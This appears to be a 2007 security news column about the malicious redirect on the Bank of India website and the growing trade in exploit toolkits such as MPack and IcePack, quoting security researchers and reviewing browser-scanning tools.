For a few hours late last week, visitors to the Bank of India Web site had their browsers covertly redirected to a site hosting malicious exploits. Increasingly, criminals, often without any technical experience, are defacing popular Web sites with code that allows them to direct your browser to download content without you even knowing. Finjan, a security company that's been on the cutting edge of detecting Web 2.0 malware, identifies 10 toolkits for sale on the Internet, up from earlier this year. If you are an online criminal these days, says Yuval Ben-Itzhak, CTO of Finjan, "you are buying a software package from hackers. Without any computer science skill or any security background, you can install this package on any Web server and start to infect people with malicious code." As long as the thieves are making money, there appears to be no sign of stopping this current rise in crimeware.

The Bank of India
A few weeks ago, I wrote about the process: criminals inject JavaScript onto a live Web page; if the site is vulnerable to script injection attacks, the code (often an iFrame) gets added to the Web site. The site's administrators have no idea that their visitors are becoming infected with whatever code the criminals want to install--Trojans usually, sometimes bots. That's what happened to the Bank of India Web site. To see a real-time video capture of what happened to the Bank of India site, watch this video.

Roger Thompson, whose company, Exploit Prevention Labs, makes LinkScanner prevention software, offers his account of what happened. Thompson says there were multiple exploits used in the Bank of India attack. "One was a simple MS06-042, which was essentially cut and pasted from the original Milw0rm proof of concept. The second exploit set was an as-yet-unidentified exploit package, along the lines of MPack / IcePack / WebAttacker. The real difference, however, is that it had machine-generated variable and function names. In other words, the server-side script was generating the scripts in order to try to defeat scanners."

	"Without any computer science skill or any security background, you can install this package on any Web server and start to infect people with malicious code," says Ben-Itzhak.

Who's responsible?
Who's responsible for creating these malicious code toolkits? Finjan's Ben-Itzhak says, "we see different groups creating them. We realize that the MPack group and the WebAttacker group are two different groups. We also believe the IcePack and Neosploit and MultiExploit toolkits are different groups, each using a different set of exploits." In July 2007, SecurityFocus editor Robert Lemos spoke with one of the members of Dream Coders Team, the party believed to be responsible for MPack. "We are just a group of people working together but doing some illegal business," he said. He also denied any contact with real-world Russian criminals.

The hacker said the Dream Coders Team (DCT) consists of three people, plus a few freelancers. The developers are all Russian, while the others are from various countries. DCT said that all the recent publicity has drawn the attention of law enforcement. "In Russia, there is a law which forbids (malicious software) creation tools like MPack, (but) we secure our systems to the best possible extent, so that even a police officer would not be able to get the PCs analyzed," said DCT. Despite these precautions, he said that "we will have to shut down the project soon."

More not less
That doesn't appear to be happening. If anything, MPack still tops Finjan's list of the most popular toolkits available today. In addition are WebAttacker and WebAttacker II, Icepack, NeoSploit, MultiExploit. "However," Ben-Itzhak says, "we see additional ones that are less known, less popular, but they are out there. They're using different techniques from the big ones and we name them in our report."

"With Flash and WinZip you'll see them on almost any desktop around the world today. So that's the reason the hackers are interested in these exploits," says Ben-Itzhak.

Exploit Prevention Labs' Thompson agrees, saying one of the Bank of India attacks "contained a VML exploit, probably MS07-004, another MS06-042, a WinZip, a QuickTime, and a SetSlice. This would be very similar to MPack / Icepack except that it is missing an ANI (MS07-017), and it contains instead the VML." For the most part, these are exploits for patches already available from Microsoft. The assumption is that the user hasn't yet patched their system, which, sadly, is often the case with non-Microsoft software.

Few zero days included with these kits
Fortunately, zero-day exploits, attacks on previously unannounced software flaws, are rare within these crimeware toolkits, says Ben-Itzhak. "Usually we'll find zero-day attacks on third-party applications rather than Microsoft operating systems. So, you'll often find zero-day attacks relating to WinZip and Adobe Flash Player, because people usually are not updating them." That's because older versions did not include automatic updates; if you didn't know to update, you remain vulnerable.

He says "Flash and WinZip are the most popular ones--but we see some others such as CD content burners, some editing tools--but these are less popular applications. With Flash and WinZip you'll see them on almost any desktop around the world today. So that's the reason the hackers are interested in these exploits."

What can be done?
Both Finjan and Exploit Prevention Labs offer free safe surfing tools. I like Finjan SecureBrowsing and Linkscanner because they actively scan the pages loading into your Internet browser. That way if someone has injected malicious code onto, say, a trusted page, these products will alert you.

McAfee SiteAdvisor continues to disappoint me. It uses a white-list database, so if the site has already been checked and declared clean, you'll see that trusted green symbol even if the site was compromised just five minutes ago. Given that so much on the Internet changes within an instant, I fail to see how SiteAdvisor can promise to protect against these kinds of attacks. On the other hand, SiteAdvisor is effective against phishing sites, something that Finjan and Exploit Preventions Labs don't do well.

You can hear Yuval Ben-Itzhak talk more about the rise of crimeware in my most recent Security Bites podcast.

You can hear Roger Thompson talk more about MPack in this June 25, 2007 Security Bites podcast.

Are you worried about crimeware when you surf the Net? What are you doing to protect yourself? Talk back to me.